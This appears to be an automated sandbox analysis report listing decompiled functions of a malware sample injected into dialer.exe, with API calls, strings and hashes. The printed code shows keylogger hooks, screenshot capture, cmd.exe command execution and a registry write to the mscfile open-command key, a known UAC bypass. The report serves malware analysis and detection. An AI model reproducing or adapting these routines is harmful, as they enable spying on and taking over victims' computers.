				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E0043BBA2(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0044C479(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043629A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E0043DFD9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E0044C479(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E004458E8(_a12, __eflags, _t213);
													L0043EE85(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E0044C479(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043629A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46a00c; // 0x3dad585e
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E0044ED70(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00431810(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0044E990(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00445501);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0042F61B(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							L0043EE85(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = L0044ED30( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E004458C3( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = L00439E14();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043626D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

APIs

_strpbrk.LIBCMT ref: 00445568
_free.LIBCMT ref: 00445685

Part of subcall function 0043629A: IsProcessorFeaturePresent.KERNEL32(00000017,0043626C,0042F919,?,?,?,0042F919,00000016,?,?,00436279,00000000,00000000,00000000,00000000,00000000), ref: 0043629C
Part of subcall function 0043629A: GetCurrentProcess.KERNEL32(C0000417,?,0042F919), ref: 004362BE
Part of subcall function 0043629A: TerminateProcess.KERNEL32(00000000,?,0042F919), ref: 004362C5

Strings

., xrefs: 0044583C
*?, xrefs: 0044555C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
Instruction ID: 9a964df7e2ccefeecbf26bda24bf2b163005b59dfbd6a4608a1e3f741a932d91
Opcode Fuzzy Hash: 7a7b7176c1580aae0b71ae669cf6646ff09206bf0b49bd2b9ed38802292f1359
Instruction Fuzzy Hash: AF51E371E0060AAFEF10CFA9C881ABEB7B5EF58314F25416EE454E7301EA799E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041510D, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041510D(void* __ecx, void* __edx, void* __eflags) {
				char _v1048;
				char _v1056;
				char _v1092;
				void* _v1096;
				char _v1112;
				char _v1120;
				void* _v1124;
				void* _v1136;
				char _v1144;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1184;
				char _v1200;
				void* _v1204;
				char _v1224;
				char _v1232;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t39;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t67;
				void* _t73;
				char* _t84;
				char* _t86;
				void* _t120;
				void* _t121;
				void* _t123;
				intOrPtr* _t124;
				signed int _t128;
				void* _t130;

				_t133 = __eflags;
				_t130 = (_t128 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t74 = __edx;
				E00403086(__edx,  &_v1184, E0040425F(__edx,  &_v1156, __ecx), _t121, __eflags, L"png");
				L00401ED0();
				E004142A5( &_v1120, __edx, __eflags, 0);
				_t84 =  &_v1120;
				_t39 =  *0x46bd10(L00401F75(_t84), E00402469(), _t120, _t123, _t73);
				_t124 = _t39;
				L00413DBA( &_v1144, _t124);
				_t86 = L"image/png";
				E00414611(_t86,  &_v1112);
				L00413E32(L00401ECB( &_v1200),  &_v1152, _t43,  &_v1112);
				 *((intOrPtr*)( *_t124 + 8))(_t124, _t86, _t84);
				if( *((char*)(L00401F75(L00401E29(0x46c578,  &_v1112, _t133, 0x1b)))) == 1) {
					E004020B5(__edx,  &_v1224);
					_t54 = E00417334(L00401ECB( &_v1200),  &_v1224);
					_t135 = _t54;
					if(_t54 != 0) {
						DeleteFileW(L00401ECB( &_v1200));
						_t57 = E00402469();
						E00405A2F( &_v1048, L00401F75(0x46c560), _t57);
						_t60 = E00402469();
						E00405B57(_t74,  &_v1056,  &_v1224,  &_v1184, L00401F75( &_v1232), _t60);
						E00403086(_t74,  &_v1120, E0040425F(_t74,  &_v1092, _t121), _t121, _t135, L"dat");
						L00401ED0();
						_t67 = L00401ECB( &_v1120);
						E004020CC(_t74, _t130 - 0x18, _t64, _t135,  &_v1200);
						E004173A6(_t67);
						L00401ED0();
						L00401FA7();
					}
					_t48 = L00401FA7();
				}
				L00413DE0(_t48,  &_v1152);
				L00401FA7();
				return L00401ED0();
			}

APIs

Part of subcall function 004142A5: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
Part of subcall function 004142A5: CreateCompatibleDC.GDI32(00000000), ref: 004142CC

Part of subcall function 00413DBA: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413DD0

Part of subcall function 00413E32: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413E43

Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351

DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7

Strings

png, xrefs: 00415120
dat, xrefs: 00415243
image/png, xrefs: 00415180

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CreateFile$GdipImage$CompatibleDeleteFromLoadSaveStream
String ID: dat$image/png$png
API String ID: 4253173196-186023265
Opcode ID: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
Instruction ID: ec78f574bbb469ede11c5765e841e4de501cabfd3cecff2c18e23e093a1ab6d9
Opcode Fuzzy Hash: c354fd6ba5973f6dbb1216fc545b0f3e7c3095f3ba04cbf11662a49e537db3b6
Instruction Fuzzy Hash: 9B4164721043405AC314FB62DC56DEFB7A9AF91348F40093FF586671E2EF385A49CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B909, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0043B909(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					L00445E89(_t52);
					GetModuleFileNameA(0, 0x46b3c8, 0x104);
					_t49 =  *0x46ba3c; // 0x2f934d0
					 *0x46ba44 = 0x46b3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x46b3c8;
					}
					_v8 = 0;
					_v16 = 0;
					E0043BA2D(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0043BBA2(_v8, _v16, 1);
					if(_t64 != 0) {
						E0043BA2D(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E004459A4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x46ba30 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x46ba34 = _t59;
									L16:
									L0043EE85(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x46ba30 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x46ba34 = _t43;
						goto L10;
					} else {
						_t44 = L00439E14();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						L0043EE85(_t64);
						return _t50;
					}
				} else {
					_t45 = L00439E14();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0043626D();
					return _t65;
				}
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\dialer.exe,00000104), ref: 0043B949
_free.LIBCMT ref: 0043BA14
_free.LIBCMT ref: 0043BA1E

Strings

C:\Windows\SysWOW64\dialer.exe, xrefs: 0043B940, 0043B947, 0043B976, 0043B9AE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\dialer.exe
API String ID: 2506810119-1041150139
Opcode ID: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
Instruction ID: 660ae339c78687f970f45cd6768a2251d83b04d254988ce5d7869c99c620db43
Opcode Fuzzy Hash: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
Instruction Fuzzy Hash: BD3173B1A01618AFDB21DF999881BAFBBA8EF89710F10506BE604D7311D7744E41CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00417868, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041795D

Part of subcall function 00410497: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 004104A6
Part of subcall function 00410497: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,004106BD,?,00000000), ref: 004104CE
Part of subcall function 00410497: RegCloseKey.ADVAPI32(00000000,?,?,?,004106BD,?,00000000), ref: 004104D9

Strings

Control Panel\Desktop, xrefs: 004178A3, 004178D6, 00417926
TileWallpaper, xrefs: 00417947
WallpaperStyle, xrefs: 004178A8, 004178DB, 0041792B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
Instruction ID: fa13f98970d9a9ebbc3df1aa31e4731e3fb9772d8354761676ac4eeabfab18a3
Opcode Fuzzy Hash: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
Instruction Fuzzy Hash: A5116332B8434072D818307A4E5FBAF18159746F61FA0416BB7013A6C6E8DF4A9943DF

Uniqueness

Uniqueness Score: -1.00%

Function 00409520, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409520(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00402064(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				E00416C32(_t31,  &_v28);
				E00409636(__ebx, _t29, _t35);
				L00401FA7();
				_t32 = _t31 - 0x18;
				E00402064(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00402064(_t19, _t32 - 0x18, "[Info]");
				E004165D8(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}

APIs

Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

CloseHandle.KERNEL32(?), ref: 00409583
UnhookWindowsHookEx.USER32 ref: 00409596

Strings

Online Keylogger Stopped, xrefs: 00409530, 00409538, 0040955F
[Info], xrefs: 0040956A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
Instruction ID: 5d632db0778c86123480600154419b6f65a677741df4c82794f5c8cb08535fc7
Opcode Fuzzy Hash: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
Instruction Fuzzy Hash: 4E01D631A003006BD7257735C90B77E7B615B41305F80006EE941221D3DA7D5D59C3DA

Uniqueness

Uniqueness Score: -1.00%

Function 0040C42E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C49C

Strings

ios_base::badbit set, xrefs: 0040C458
ios_base::failbit set, xrefs: 0040C47E
ios_base::eofbit set, xrefs: 0040C48B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
Instruction ID: 00d2e120a14ed07e696206c725bb703fde342002c12277e6dbbb730505fe52c1
Opcode Fuzzy Hash: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
Instruction Fuzzy Hash: 0001D671580208FAD710EB51C8E3F7E7358AF14705F20826FB915791C3EA7C6542866F

Uniqueness

Uniqueness Score: -1.00%

Function 00412092, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				L00401ED0();
				L00401ED0();
				L00401E54( &_a16, _t35);
				L00401FA7();
				L00401FA7();
				return 0;
			}

0x00412092
0x004120ac
0x004120b2
0x004120d4
0x004120de
0x00412b2a
0x00412d65
0x00412d71
0x00412d7d
0x00412d8a

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4

Strings

cmd.exe, xrefs: 004120C9
open, xrefs: 004120CE
/C , xrefs: 004120B2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
Opcode Fuzzy Hash: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A

Uniqueness

Uniqueness Score: -1.00%

Function 0041033E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041033E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x45f714);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040425F(_t17, _t21);
				return _t21;
			}

0x0041034c
0x0041035b
0x00410370
0x0041039b
0x00410372
0x00410383
0x0041038c
0x00410398
0x00410398
0x004103a2
0x004103ae

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
RegCloseKey.ADVAPI32(00000000), ref: 0041038C

Strings

http\shell\open\command, xrefs: 0041035E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
Opcode Fuzzy Hash: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8

Uniqueness

Uniqueness Score: -1.00%

Function 0041053C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041053C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E00402469();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, L00401ECB( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				L00401ED0();
				return _t23;
			}

0x0041053f
0x00410540
0x0041054f
0x0041058f
0x00410551
0x00410555
0x00410576
0x00410581
0x0041058a
0x0041058a
0x00410594
0x0041059f

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046BB08), ref: 00410547
RegSetValueExW.ADVAPI32(0046BB08,0045F714,00000000,00000000,00000000,00000000,0045F714,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410576
RegCloseKey.ADVAPI32(0046BB08,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410581

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 00410545

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
Instruction ID: b35e326baa4341fdc783df4f92487e38f7185df5fc588de708a2e43aa04f4aed
Opcode Fuzzy Hash: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
Instruction Fuzzy Hash: B3F0A932400218BBCF109FA1ED0AEEE776CEB04782F00462ABD05A60A1EA759F14DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401397, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401397() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46c5cc = _t2;
				return _t2;
			}

0x004013a8
0x004013ae
0x004013b3

